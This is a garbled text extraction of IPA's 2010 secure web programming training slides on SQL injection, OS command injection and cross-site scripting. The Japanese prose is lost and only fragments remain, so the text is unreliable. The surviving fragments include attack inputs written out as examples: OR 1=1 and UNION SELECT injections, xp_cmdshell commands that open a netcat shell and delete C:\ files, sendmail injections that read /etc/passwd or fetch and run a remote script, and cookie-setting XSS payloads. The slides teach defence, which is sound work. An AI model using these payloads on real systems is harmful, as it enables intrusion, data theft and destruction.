3 3 2010 4 IPA Web http://www.ipa.go.jp/security/awareness/vendor/programming Copyright 2010 IPA 1 3-1 3-1-1 SQL #1 3-1-2 SQL #2 3-1-3 3-1-4 3-2 3-2-1 #2 3-2-2 #1 3-2-3 HTTP 3-3 3-3-1 3-3-2 Copyright 2010 IPA 2
3-1 3-1-1 SQL #1 3-1-2 SQL #2 3-1-3 3-1-4 Copyright 2010 IPA 3 3-1-1 SQL 1 Copyright 2010 IPA 4
SQL SQL SQL SELECT uid FROM account_table WHERE uid=' ID' AND pw=' ID(uid) (pw) (account_table) ID(uid) SQL ID Copyright 2010 IPA 5 SQL ID OR 1=1-- SELECT uid FROM account_table WHERE uid='' OR 1=1--' AND pw=' OR 1=1-- OR 1=1 uid -- ID SQL ( ) SQL SQL Copyright 2010 IPA 6
SQL SQL Copyright 2010 IPA 7 SQL SQL SQL Copyright 2010 IPA 8
SQL Copyright 2010 IPA 9 SQL JavaScript Web ABT-9800134 11 3 4-7 SQL Copyright 2010 IPA 10 -s-
SQL SQL SQL SQL API API DB SQL API Copyright 2010 IPA 11 << Java >> String parameter = ; Connection c = ; // SQL PreparedStatement st = c.preparestatement("select name, price FROM product_table WHERE code=?"); st.setstring(1, parameter); //? // ResultSet rs = st.executequery(); [ http://www.thinkit.co.jp/cert/tech/7/5/3.htm] Copyright 2010 IPA 12
'...' SQL... SQL ' ' ' SQL SQL ' '' ( ' 'don''t' '80''s' 'Quark''s Bar' SQL don't 80's Quark's Bar SQL ' 2 1 Copyright 2010 IPA 13 '...' \ \( ) RDBMS(Relational DataBase Management System) \ \\ 2 \ UNION SELECT uid, pw FROM account_table-- ' 2 SQL SELECT name, price FROM product_table WHERE category='\' UNION SELECT uid,pw FROM account_table-- 2 '' \ ' Copyright 2010 IPA 14 -s-
'...' SQL... SQL - 0-9 - 0-9. + - 0-9. E e 1 Copyright 2010 IPA 15 '...' RDBMS ; SQL SQL 123; update account_table set pw='foo' where uid='admin' RDBMS ; 123 delete from account_table Copyright 2010 IPA 16 -s-
3-1-2 SQL #2 Copyright 2010 IPA 17 SQL : #2 ( ) HTML 1. SQL OS:Windwos Web IIS DB MS SQL Server Microsoft OLE DB Provider for ODBC Drivers(0x80040E14) [MicroSoft][ODBC SQL Server Driver][SQL Server] " and password= 2. SQL SQL 3. DB 4. (3) SQL HTML Copyright 2010 IPA 18
PHP PHP php.ini! display_errors=off» HTML display_startup_errors=off» PHP HTML» display_errors Off Off Copyright 2010 IPA 19 -s- Web Web IIS Apache Apache - Apache 2.0.59 ErrorLog logs/error.log LogLevel warn debug, info, notice, warn, error, crit, alert, emerg ServerTokens Full Full OS Minor Minimal Major Prod ServerSignature On On Off EMail Copyright 2010 IPA 20
RDBMS RDBMS DB PostgreSQL postgresql.conf SILENT_MODE (boolean) default : off silent_mode syslog SYSLOG ( ) default : 0 syslog 0 OS syslog 1 OS syslog 2 OS syslog Copyright 2010 IPA 21 -s- (select ) (insert update ) Copyright 2010 IPA 22
Copyright 2010 IPA 23 Microsoft SQL Server xp_cmdshell SQL Windows '; exec master..xp_cmdshell 'nc -l -p 666 -e cmd.exe'-- VBScript '; exec master..xp_cmdshell 'echo 1 >> bad.vbs'-- '; exec master..xp_cmdshell 'echo 2 >> bad.vbs'-- '; exec master..xp_cmdshell 'echo 3 >> bad.vbs'-- '; exec master..xp_cmdshell 'bad.vbs'-- ; exec master..xp_cmdshell 'del c:\*.* /F/Q/S'-- xp_cmdshell Copyright 2010 IPA 24
3-1-3 Copyright 2010 IPA 25 OS Copyright 2010 IPA 26
Copyright 2010 IPA 27 sendmail Perl $to_address = cgi->param{'to_address'}; $message_file = "/app/data/0012.txt"; system("sendmail $to_address <$message_file"); to_address 1. : evil@site </etc/passwd # /etc/passwd 2. : dummy@site </dev/null; nc -l -p 8080 sh # 3. : dummy@site </dev/null; wget http://site/badscript; sh badscript # Copyright 2010 IPA 28
1 1. API API API Perl exec(), system(), `...`, qx/.../ open(h, " {command}"), open(h, "{command} ") open() sysopen() open() < > open(handle, $pathname Copyright 2010 IPA 29 1 PHP exec(), passthru(), proc_open(), shell_exec(), system() Python os.system(), os.popen() Ruby exec(), system(), `...` exec() 1 *? {} [] <> () ~ & \ $ ; ` \n open(" {command}", mode, perm), open(" -{command}", mode, perm) open() open() 1 Copyright 2010 IPA 30
2 1. Copyright 2010 IPA 31 3 1. API API C execve exec Java Runtime exec Perl API PHP PCNTL pcntl_exec POSIX exec Web PHP pcntl_exec Web Copyright 2010 IPA 32
3 2. bash ; & ` ( ) $ < > *? { } [ ]! 3. Perl %ENV = (); $ENV{'PATH'} = "/bin:/usr/bin"; system($command); Copyright 2010 IPA 33 4 1. chroot chroot chroot root Copyright 2010 IPA 34 -s-
3-1-4 Copyright 2010 IPA 35 Web Web 3 1. 2. 3. Copyright 2010 IPA 36
Web 1. 2. 3. <select> - <option> 4. 5. HTTP 1. Cookie: 2. Referer: 3. User-Agent: Copyright 2010 IPA 37 Copyright 2010 IPA 38
JavaScript HTTP JavaScript Copyright 2010 IPA 39 3-2 3-2-1 #2 3-2-2 #1 3-2-3 HTTP Copyright 2010 IPA 40
3-2-1 #2 Copyright 2010 IPA 41 : #2 JavaScript 1. HTML HTML 2. Web JavaScript 3. HTML Copyright 2010 IPA 42
4. HTTP 5. 1. 2. Web 3. Cookie Cookie 4. Cookie Cookie Web ID 5. Hidden Hidden Web 窃取 Copyright 2010 IPA 43 Copyright 2010 IPA 44
HTML 1. <script> 2. <script> URL 3. <img src= javascript:... > URL 4. <div style=...;z:expression(...);... > style 5. <span onmouseover=... > 6. <a href= &{...}; > Netscape 4.x JavaScript Copyright 2010 IPA 45 Copyright 2010 IPA 46
Web (1) <script>document.cookie='jsessionid=bad'</script> (2) > <script> '"><script>document.cookie='jsessionid=bad'</script> (3) HTML <script> --><script>document.cookie='jsessionid=bad'</script> (4) javascript: URL javascript:document.cookie='jsessionid=bad' Copyright 2010 IPA 47 (5) expression() red;z:expression(document.cookie='jsessionid=bad') (6) xxx ';document.cookie='jsessionid=bad (7) <script>...</script> xxx ';document.cookie='jsessionid=bad (6) Copyright 2010 IPA 48
3-2-2 #1 Copyright 2010 IPA 49 Copyright 2010 IPA 50
HTML Copyright 2010 IPA 51 (1) (1) HTML HTML < < <...> </ > > > " ' & & <script>...</script> URL style <form id="xxx"> HTML <!-- xxx --> URL style <script>...</script> UTF-7 HTML Copyright 2010 IPA 52
(2) (2) HTML URL href= src= style style= onload= onmouseover= <script>...</script> <script>...</script> 'xxx' URL style <script> JavaScript Copyright 2010 IPA 53 (2) 1. URL URL» http://» https://» / 2. style <script>...</script>» style»» <script>...</script> JavaScript» `» ;» :» ( ) Copyright 2010 IPA 54 -s-
(3) (3) HTML HTML Web HTML HTML HTML HTML HTML HTML HTML Copyright 2010 IPA 55 (4) (4) Web HTML HTTP HTTP Content-Type: text/html; charset= > HTML <meta http-equiv="content-type" content="text/html; charset= "> (1) (4) UTF-7 < +ADwA- Web Content-Type charset HTML UTF-7 Copyright 2010 IPA 56 -s- -s-
3-2-3 HTTP HTTP Copyright 2010 IPA 57 3-3 3-3-1 3-3-2 Copyright 2010 IPA 58 -s- -s-
3-3-1 Copyright 2010 IPA 59 3-3-2 Copyright 2010 IPA 60 -s- -s-
Q & A Copyright 2010 IPA 61 n